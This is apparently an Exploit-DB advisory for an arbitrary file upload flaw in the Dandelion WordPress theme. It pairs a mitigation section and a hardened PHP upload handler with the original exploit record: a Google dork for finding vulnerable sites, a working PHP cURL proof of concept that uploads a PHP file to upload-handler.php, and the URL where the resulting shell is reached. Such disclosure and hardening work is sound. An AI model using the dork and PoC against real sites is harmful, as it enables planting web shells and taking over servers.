Vendor: Dandelion Powerful Elegant Wordpress Theme
By: TheBlackMonster (Marouane)
CVSS: 7.5 (HIGH)
Vulnerability type: Arbitrary File Upload
CWE: 434
Product Name: Dandelion Powerful Elegant Wordpress Theme
Affected Version From: Web Application
Affected Version To: Web Application
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozilla, Chrome, Opera -> Windows & Linux
Year: 2014

WordPress Dandelion Themes Arbitrary File Upload

An arbitrary file upload vulnerability exists in the Dandelion theme for WordPress. The cause is insufficient validation of the uploaded file's type in the upload-handler.php script in the theme's functions directory: an attacker can upload a malicious file with a double extension such as .php.jpg, and if the web server treats that file as PHP, the attacker can execute arbitrary code on the server.

Mitigation:

Ensure that the application validates the type of each uploaded file (by content, not only by the client-supplied name) and only accepts files whose extension is on the expected list.
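As an added example (not the theme's code and not from the original advisory), the following is a hardened upload handler that applies the mitigation above: it requires an authenticated user with the upload capability and a valid nonce, accepts exactly one extension from an allowlist (so a double extension such as .php.jpg is rejected), checks the detected MIME type of the file content against that extension, and stores the file under a random name. The ALLOWED_TYPES map, the function names, the nonce action name 'theme_upload' and the 'Filedata' field name (taken from the PoC on this page) are assumptions; current_user_can, check_ajax_referer and wp_upload_dir are WordPress core functions.

```php
<?php
// Added example of a hardened upload handler; not the Dandelion theme's code.
// ALLOWED_TYPES, validate_upload, store_upload and the nonce action name are assumptions.
declare(strict_types=1);

const ALLOWED_TYPES = [
    // extension => MIME types acceptable for file *content* (detected via finfo)
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
];

/**
 * Validate one $_FILES entry and return the extension to store it under.
 * Throws RuntimeException when the upload must be rejected.
 */
function validate_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with error code ' . (int) $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // The client-supplied name is used only to derive the extension.
    $parts = explode('.', basename($file['name']));
    if (count($parts) !== 2 || $parts[0] === '') {
        // Rejects "shell.php.jpg" (two extensions) and names with no extension.
        throw new RuntimeException('exactly one extension is required');
    }
    $ext = strtolower($parts[1]);
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException("extension .$ext is not allowed");
    }

    // Check the actual content; $file['type'] is attacker-controlled and ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        throw new RuntimeException("detected content type $mime does not match .$ext");
    }
    return $ext;
}

/**
 * Move a validated upload into $dir under a random filename, so the client
 * controls neither the stored name nor the path.
 */
function store_upload(array $file, string $dir): string
{
    $ext  = validate_upload($file);
    $dest = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move uploaded file');
    }
    chmod($dest, 0644); // readable, never executable
    return $dest;
}

// Authorization first: only logged-in users with the upload_files capability
// and a valid nonce (action name 'theme_upload' is an assumption) get this far.
if (!function_exists('current_user_can')
    || !current_user_can('upload_files')
    || !check_ajax_referer('theme_upload', '_wpnonce', false)) {
    http_response_code(403);
    exit('forbidden');
}

header('Content-Type: application/json');
try {
    $stored = store_upload($_FILES['Filedata'] ?? [], wp_upload_dir()['path']);
    echo json_encode(['ok' => true, 'file' => basename($stored)]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['ok' => false, 'error' => $e->getMessage()]);
}
```

As defence in depth, the uploads directory should also be configured so the web server never executes scripts from it (for example an Apache rule that disables the PHP handler under wp-content/uploads); then even a file that slips past validation is served as static content rather than run.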

Exploit-DB raw data:

# Exploit Title: Wordpress Dandelion Themes Arbitrary File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
# Greetz : PhantomGhost, Deto Beiber, All Moroccan Hackers.

We are Moroccans, we are genius !

<?php
// PoC as posted: POSTs a local file to the theme's upload handler.
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
// "Filedata" is the form field the handler reads; "@file" is the legacy
// (pre-PHP 5.5) curl notation for attaching a file to a POST field.
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the response body instead of printing it
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

File Access :

http://127.0.0.1/uploads/[years]/[month]/your_shell.php